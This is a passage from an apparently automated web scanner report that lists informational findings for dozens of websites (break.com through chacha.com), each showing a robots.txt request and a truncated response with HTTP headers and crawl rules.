Varnish-X-Cache: HIT
ETag: "1f70035-77e-4977a49df0700"
Last-Modified: Wed, 15 Dec 2010 22:16:28 GMT
Varnish-X-Cache-Hits: 191
Content-Length: 1918
Cache-Control: max-age=17
Date: Sat, 02 Apr 2011 13:40:12 GMT
Connection: close

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

24.128. http://www.break.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.break.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.break.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Mon, 24 Jan 2011 23:57:00 GMT
ETag: "1eac576422bccb1:b41f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 24
Date: Sat, 02 Apr 2011 12:37:52 GMT
X-Varnish: 928889783 928791491
Age: 760
Via: 1.1 varnish
Connection: close
X-Varnish-Host: varnish01
X-Client-IP: 173.193.214.243
X-Country: US

User-agent: *

Allow: /

24.129. http://www.brighthub.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.brighthub.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.brighthub.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Sat, 02 Apr 2011 08:42:50 GMT
Accept-Ranges: bytes
ETag: "8479cff211f1cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 538
Date: Sat, 02 Apr 2011 13:35:45 GMT
Connection: close

# Robots.txt file for http://www.brighthub.com
#

User-agent: *
Disallow: /error.htm
Disallow: /servererror.aspx
Disallow: /email/email_nocontact.aspx
Disallow: /email/comment_unsubscribe.aspx
...[SNIP]...

24.130. http://www.britannica.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.britannica.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.britannica.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:40:31 GMT
Server: Apache/2.0.64 (Unix) mod_jk/1.2.31
Last-Modified: Tue, 23 Nov 2010 00:46:28 GMT
ETag: "264014-342-495adb3f68100"
Accept-Ranges: bytes
Content-Length: 834
Vary: Accept-Encoding,User-Agent
MyHeader: web103-b
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

# /robots.txt file for encyclopaedia britannica
# disallow spidering into ebsco


Sitemap: http://www.britannica.com/bps-gsm-index.xml

User-agent: *
Disallow: /search
Disallow: /search/magazine
Disal
...[SNIP]...

24.131. http://www.brothersoft.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.brothersoft.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.brothersoft.com

Response

HTTP/1.0 200 OK
Server: BSWS/1.0
Content-Type: text/plain; charset=UTF-8
Content-Length: 404
Last-Modified: Fri, 07 Jan 2011 06:35:52 GMT
Accept-Ranges: bytes
Date: Sat, 02 Apr 2011 13:25:32 GMT
Connection: close

User-agent: *
Disallow: /admin/
Disallow: /newadmin/
Disallow: /newdbs/
Disallow: /newfunction/
Disallow: /adpage/
Disallow: /blog/wp-login.php
Disallow: /mobile/d_log.php
Disallow: /d.php
Di
...[SNIP]...

24.132. http://www.btradv.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.btradv.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.btradv.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:52:38 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.11
Last-Modified: Sat, 07 Jun 2008 01:21:00 GMT
ETag: "b004e-17-44f0964209700"
Accept-Ranges: bytes
Content-Length: 23
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

24.133. http://www.business.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.business.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.business.com

Response

HTTP/1.0 200 OK
Cteonnt-Length: 207
Content-Type: text/plain
Last-Modified: Mon, 25 Oct 2010 20:55:48 GMT
ETag: "4fbb9408774cb1:cfa"
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONa HISa TELa OUR DELa SAMa UNRa PUBa OTRa BUS UNI COM NAV INT CNT PRE LOC"
Cache-Control: private, max-age=367320
Date: Sat, 02 Apr 2011 13:32:59 GMT
Content-Length: 207
Connection: close
Set-Cookie: Client-IP=173.193.214.243

User-agent: *
Disallow: /_css/
Disallow: /images/
Disallow: /images2/
Disallow: /internet/
Disallow: /search/
Disallow: /demo/
Disallow: /dexknows/

Sitemap: http://www.business.com/sitemap.
...[SNIP]...

24.134. http://www.businessweek.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.businessweek.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.businessweek.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.31
Last-Modified: Tue, 03 Nov 2009 16:42:26 GMT
benv: nybweb03
bvh: www.businessweek.com
Content-Type: text/plain
Date: Sat, 02 Apr 2011 13:25:41 GMT
Content-Length: 359
Connection: close

User-agent: *
Disallow: /event.ng
Disallow: /click.ng
Disallow: /reuters_stories
Disallow: /reprints
Disallow: /fixedcontent.htm
Disallow: /custserv
Disallow: /print
Disallow: /premium
Disallow: /tech
...[SNIP]...

24.135. http://www.buy.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.buy.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.buy.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Fri, 22 Oct 2010 20:39:18 GMT
Accept-Ranges: bytes
ETag: "7e3ef3322972cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 467
Date: Sat, 02 Apr 2011 13:37:44 GMT
Connection: close

# robots.txt for http://www.buy.com

User-agent: *
Disallow: /basket/
Disallow: /retail/
Disallow: /corp/
Disallow: /clickfrom/
Disallow: /linksys-covad/
Disallow: /faqs/
Disallow: /support/
...[SNIP]...

24.136. http://www.buysafe.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.buysafe.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.buysafe.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Length: 366
Content-Type: text/plain
Last-Modified: Wed, 10 Dec 2008 18:05:54 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="ALL DSP COR CUR ADM DEV TAI PSA PSD IVA IVD CONo HIS OUR SAMi LEG UNI NAV"
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:53:59 GMT
Connection: close

User-Agent: *
Disallow: /tiastesting/
Disallow: /buysaferedesign/
Disallow: /websitebonding/
Disallow: /toolbar/
Allow: /
Disallow: /templates/

User-Agent: Googlebot-Image
Disallow: /email_i
...[SNIP]...

24.137. http://www.buzzfeed.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.buzzfeed.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.buzzfeed.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:37:15 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 12 Jan 2011 20:44:18 GMT
ETag: "119011a-1f1-499ac43d06c80"
Accept-Ranges: bytes
Content-Length: 497
Vary: Accept-Encoding,User-Agent
X-BuzzFeed: feed5
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: msnbot
Crawl-delay: 120
Disallow: /*.xml$
Disallow: /buzz/*.xml$
Disallow: /category/*.xml$
Disallow: /mobile/
Disallow: *?s=mobile
Disallow: *?s=lightbox
Disallow: /buzzfeed
Disallow: /c
...[SNIP]...

24.138. http://www.buzzillions.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.buzzillions.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.buzzillions.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:03:30 GMT
Server: Apache/2.2.9 (Unix)
Last-Modified: Fri, 12 Nov 2010 01:16:42 GMT
ETag: "72a"
Accept-Ranges: bytes
Content-Length: 1834
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

User-Agent: MediaPartners-Google
Disallow:
Disallow: /public/feeds
Disallow: /pages/popups
Disallow: /pages/promotions

User-Agent: Adsbot-Google
Disallow:
Disallow: /public/feeds
Disallow: /
...[SNIP]...

24.139. http://www.buzznet.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.buzznet.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.buzznet.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:44:26 GMT
Server: Apache
Set-Cookie: bncom=173.193.214.243.8450130175186681; path=/; domain=.buzznet.com
X-Powered-By: PHP/5.2.6
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /error.php
Disallow: /error/
Disallow: /user/error.php
Disallow: /user/error/
Disallow: /chtml/
Disallow: /user/rss/
Disallow: /user/atom/
Disallow: /user/rss091.xml
Disallow:
...[SNIP]...

24.140. http://www.ca.gov/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ca.gov
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ca.gov

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Wed, 02 Jun 2010 07:10:15 GMT
Accept-Ranges: bytes
ETag: "581786a6222cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:25:03 GMT
Connection: close
Content-Length: 114

User-agent: *
Disallow: /images/
Disallow: /css/
Disallow: /javascript/
Disallow: /ssi/
Disallow: /templates/

24.141. http://www.cabelas.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cabelas.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cabelas.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 16 Dec 2010 20:42:54 GMT
Content-Type: text/plain; charset=UTF-8
Expires: Sat, 02 Apr 2011 13:32:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:32:03 GMT
Content-Length: 318
Connection: close

# Modified 20101215
User-agent: *
Disallow: /cabelas/
Disallow: /products/
Disallow: /search
Disallow: /content
Disallow: /browse
Disallow: /custserv/
Disallow: /user/
Disallow: /checkout
...[SNIP]...

24.142. http://www.cafemom.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafemom.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cafemom.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:25:28 GMT
Server: Apache
Cache-Control: max-age=900
Vary: Accept-Encoding
Content-Length: 376
Connection: close
Content-Type: text/plain; charset=utf-8


User-agent: *
Sitemap: http://www.cafemom.com/sitemap.xml
Disallow: /admin/
Disallow: /*PHPSESSID
Disallow: /*utm_medium
Disallow: /photos/
Disallow: /search/
Disallow: /profile/
Disallow: /chatterbo
...[SNIP]...

24.143. http://www.canada.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.canada.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.canada.com

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Compression-Control: no-compress
Content-Type: text/plain
Content-Length: 1240
Cache-Control: private, max-age=3600
Expires: Sat, 02 Apr 2011 14:41:16 GMT
Date: Sat, 02 Apr 2011 13:41:16 GMT
Connection: close

User-agent: Googlebot-Mobile
Allow: /mobile/

User-agent: YahooSeeker/M1A1-R2D2
Allow: /mobile/

Disallow: /_doc/*
Disallow: /_staging/*
Disallow: /_tech/*
Disallow: /_data/*

#
# BEGIN FP
...[SNIP]...

24.144. http://www.candystand.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.candystand.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.candystand.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 19 Jan 2010 03:24:14 GMT
ETag: "104317-95-47d7c010eb380"
Accept-Ranges: bytes
Content-Length: 149
Content-Type: text/plain; charset=ISO-8859-1
Date: Sat, 02 Apr 2011 13:23:02 GMT
Connection: close
X-N: S

User-Agent: *
Allow: /my-candystand
Allow: /my-player-profile
Allow: /my/index
Allow: /my-page
Disallow: /my/
Disallow: /ajax/
Disallow: /r.do

24.145. http://www.canon.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.canon.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.canon.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:59:10 GMT
Server: Apache
Last-Modified: Mon, 20 Dec 2010 07:30:23 GMT
ETag: "59183e3-49-497d27e3261c0"
Accept-Ranges: bytes
Content-Length: 73
Connection: close
Content-Type: text/plain

# robots.txt for http://www.canon.com/

User-Agent: *
Disallow: /js/

24.146. http://www.caranddriver.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.caranddriver.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.caranddriver.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.17 (Unix) DAV/2 PHP/5.2.6
Last-Modified: Thu, 29 Jul 2010 21:15:54 GMT
ETag: "69417b-63-48c8d3d537680"
Accept-Ranges: bytes
Content-Length: 99
Content-Type: text/plain
Cache-Control: max-age=60
Date: Sat, 02 Apr 2011 14:03:34 GMT
Connection: close

User-agent: *
Disallow: /content/
Sitemap: http://www.caranddriver.com/cdsitemap/sitemap_index.xml

24.147. http://www.care2.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.care2.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.care2.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:42:24 GMT
Server: Apache/2.2.8
Last-Modified: Wed, 02 Jun 2010 22:42:44 GMT
ETag: "bea353-3b4-48813cee96100"
Accept-Ranges: bytes
Content-Length: 948
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

# http://info.webcrawler.com/mak/projects/robots/exclusion-admin.html
#
User-agent: *
Disallow: /r.html
Disallow: /mail.html
Disallow: /community/tos_popup.html
Disallow: /ecards/p/
Disallow: /send/pi
...[SNIP]...

24.148. http://www.careerbuilder.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.careerbuilder.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.careerbuilder.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/plain
Last-Modified: Wed, 16 Mar 2011 13:10:16 GMT
Accept-Ranges: bytes
ETag: "c834ed7ddbe3cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
X-PBY: REBEL1
Date: Sat, 02 Apr 2011 12:42:26 GMT
Connection: close
Content-Length: 5654

User-agent: Mediapartners-Google*
Disallow:

User-agent: Google*
Disallow: /Custom/
Disallow: /custom/
Disallow: /Partner/
Disallow: /partner/
Disallow: /PSA/
Disallow: /psa/
Disallow: /RTQ
...[SNIP]...

24.149. http://www.careerrookie.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.careerrookie.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.careerrookie.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/plain
Last-Modified: Wed, 16 Mar 2011 13:10:16 GMT
Accept-Ranges: bytes
ETag: "c834ed7ddbe3cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
X-PBY: BEAR41
Date: Sat, 02 Apr 2011 14:02:26 GMT
Connection: close
Content-Length: 5654

User-agent: Mediapartners-Google*
Disallow:

User-agent: Google*
Disallow: /Custom/
Disallow: /custom/
Disallow: /Partner/
Disallow: /partner/
Disallow: /PSA/
Disallow: /psa/
Disallow: /RTQ
...[SNIP]...

24.150. http://www.caringbridge.org/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.caringbridge.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.caringbridge.org

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:44:06 GMT
Server: Apache
Last-Modified: Sun, 13 Feb 2011 16:57:43 GMT
ETag: "c3988b-4a8-49c2cd4692fc0"
Accept-Ranges: bytes
Content-Length: 1192
Cache-Control: max-age=0
Expires: Sat, 02 Apr 2011 13:44:06 GMT
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: googlebot-image
Disallow: /
User-agent: yahoo-mmcrawler
Disallow: /
User-agent: psbot
Disallow: /
User-agent: asterias
Disallow: /
User-agent: *
Disallow: /cgi-bin/
Disallow: /mn/
Disallow
...[SNIP]...

24.151. http://www.carmax.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.carmax.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.carmax.com

Response

HTTP/1.1 200 OK
Set-Cookie: KMXCOM=UPIJWISKMXCOMWEB031T0x0000000e_0xc70bb1c1COIIM; expires=Sat, 2-Apr-2011 14:42:09 GMT; path=/
Content-Length: 13364
Content-Type: text/plain
Last-Modified: Mon, 19 Jul 2010 15:48:13 GMT
Accept-Ranges: bytes
ETag: "3087a2cb5927cb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:42:11 GMT
Connection: close

User-Agent: *
#vehicle search
Disallow: /enUS/zip-entry/
Disallow: /enUS/store-entry/
Disallow: /enUS/search-results/
Disallow: /enUS/advanced-search/
Disallow: /enUS/compare-cars/
#car page
D
...[SNIP]...

24.152. http://www.carnival.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.carnival.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.carnival.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Tue, 25 Jan 2011 20:35:13 GMT
ETag: "214ffd5dcfbccb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:56:17 GMT
Content-Length: 638
Connection: close

User-Agent: *
Disallow: /Errors/
Disallow: /BookEngine.aspx
Disallow: /Redir.aspx
Disallow: /SiteSearchRedirect.aspx
Disallow: /Search/Default.aspx
Disallow: /find_a_Cruise/search_Results.aspx

...[SNIP]...

24.153. http://www.cars.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cars.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cars.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:37:45 GMT
Server: IBM_HTTP_Server
Last-Modified: Mon, 19 Jul 2010 20:42:34 GMT
ETag: "9ce4-573-9bb42280"
Accept-Ranges: bytes
Content-Length: 1395
P3P: policyref="/w3c/p3p.xml", CP="ALL DEM ONL PHY PUR CUR OUR BUS IND"
Connection: close
Content-Type: text/plain
Set-Cookie: cars_persist=3980465324.20480.0000; expires=Sat, 02-Apr-2011 14:08:01 GMT; path=/
Vary: Accept-Encoding, User-Agent

# /robots.txt file for http://www.cars.com

Sitemap: http://www.cars.com/sitemap_index.xml

User-agent: *
Disallow: /cgi-bin
Disallow: /news
Disallow: /privatebeta
Disallow: /searchpreview
Di
...[SNIP]...

24.154. http://www.cartoonnetwork.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cartoonnetwork.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cartoonnetwork.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:44:47 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 02 Apr 2011 13:54:12 GMT
Content-Length: 418
Content-Type: text/plain
Connection: close

User-agent: *
Disallow: /help/
Disallow: /tools/
Disallow: /templatedata/
Disallow: /error_page/
Disallow: /gen/
Disallow: /test/
Disallow: /contests/
Disallow: /data/
Disallow: /inc/
Disallow: /redir
...[SNIP]...

24.155. http://www.casttv.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.casttv.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.casttv.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 02 Apr 2011 13:45:51 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 60
Last-Modified: Mon, 18 Oct 2010 19:13:05 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

# robots.txt for www
User-agent: *
Disallow: /ext/
Allow: /

24.156. http://www.cbc.ca/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cbc.ca
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cbc.ca

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 31 Mar 2011 19:58:16 GMT
ETag: "cc016-360-b6cee600"
X-Origin-Server: web23:sb10
Content-Type: text/plain
Date: Sat, 02 Apr 2011 14:00:02 GMT
Content-Length: 864
Connection: close
X-N: S

# robots, scram
#place all comments here as they cannot be inline.
# $Id: cbc.ca-robots.txt 2844 2010-12-14 16:41:33Z nashedm $
# /cp/ - RT50606
# /photogallery/*.xml$ - HD61301

User-agent: *
Disallo
...[SNIP]...

24.157. http://www.cbs.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cbs.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cbs.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 30 Nov 2010 20:48:00 GMT
X-Real-Server: ws3228.drt.cbsig.net
Content-Type: text/plain; charset=ISO-8859-1
Date: Sat, 02 Apr 2011 13:27:27 GMT
Content-Length: 7487
Connection: close

Sitemap: http://www.cbs.com/sitemap-index-videos.xml
Sitemap: http://www.cbs.com/sitemap-index-users.xml

User-agent: *
Disallow: /upload/0808/2426664/
Disallow: /34h3t08h/
Disallow: /76Vv_7__5N__w_Jz
...[SNIP]...

24.158. http://www.cbssports.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cbssports.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cbssports.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:25:08 GMT
Server: Apache
Last-Modified: Mon, 09 Aug 2010 19:03:34 GMT
Accept-Ranges: bytes
Content-Length: 55
Cache-Control: max-age=0
Expires: Sat, 02 Apr 2011 13:25:08 GMT
Vary: Accept-Encoding
X-Media: ws1173-fe.tm
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /info/search
Disallow: /data/*

24.159. http://www.cdc.gov/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cdc.gov
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cdc.gov

Response

HTTP/1.0 200 OK
Content-Length: 924
Content-Type: text/plain
Last-Modified: Mon, 24 Mar 2008 18:22:49 GMT
Accept-Ranges: bytes
ETag: "363a9110dc8dc81:ec94"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:44:56 GMT
Connection: close

# Ignore FrontPage files
User-agent: *
Disallow: /_borders
Disallow: /_derived
Disallow: /_fpclass
Disallow: /_overlay
Disallow: /_private
Disallow: /_themes
Disallow: /_vti_bin
Disallow: /_v
...[SNIP]...

24.160. http://www.cdkitchen.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cdkitchen.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cdkitchen.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:35:54 GMT
Server: Apache/1.3.42 (Unix) PHP/4.4.7 mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_ssl/2.8.31 OpenSSL/0.9.8e-fips-rhel5
Last-Modified: Fri, 18 Mar 2011 04:48:04 GMT
ETag: "2d79c00-3167-4d82e404"
Accept-Ranges: bytes
Content-Length: 12647
Connection: close
Content-Type: text/plain

# This is just for bots that actually obey robots.txt files. We block bots
# in other ways as well.

User-agent: Yahoo-MMCrawler
Disallow: /

User-agent: dotbot
Disallow: /

User-agent: MLBot
Disall
...[SNIP]...

24.161. http://www.cduniverse.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cduniverse.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cduniverse.com

Response

HTTP/1.0 200 OK
Content-Length: 601
Content-Type: text/plain
Last-Modified: Wed, 31 Mar 2010 14:20:05 GMT
Accept-Ranges: bytes
ETag: "80d82b42ddd0ca1:133d"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:43:20 GMT
Connection: close

###########################################################################
## Start New Site Disallows ##
##############################################
...[SNIP]...

24.162. http://www.celebrity-gossip.net/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.celebrity-gossip.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.celebrity-gossip.net

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (CentOS)
Last-Modified: Thu, 13 Jan 2011 22:00:03 GMT
Cache-Control: max-age=1209600
Vary: Accept-Encoding
Content-Type: text/plain; charset=UTF-8
Content-Length: 1628
X-Cacheable: YES
Date: Sat, 02 Apr 2011 13:45:11 GMT
X-Varnish: 2210099810 2210006526
Age: 410
Via: 1.1 varnish
Connection: close
X-Cache: HIT
X-Cache-Hits: 5

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

24.163. http://www.census.gov/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.census.gov
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.census.gov

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:12:47 GMT
Server: Apache
Last-Modified: Thu, 15 Jul 2004 18:05:49 GMT
ETag: "6e4361-ad-3df458d731940"
Accept-Ranges: bytes
Content-Length: 173
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /fpdsp/
Disallow: /system/
Disallow: /dcmd/
Disallow: /population/www/coop/server/
Disallow: /cgi-bin/
Disallow: /test/
Disallow: /hrd/www/title13/

24.164. http://www.chacha.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.chacha.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.chacha.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: sessionId=YmEwYWIxYmItNDg5NC00YmY1LThjMWItNzRhNjYyNjhhMzQzo6b4; Expires=Sat, 23-Apr-2011 08:43:29 GMT; Path=/
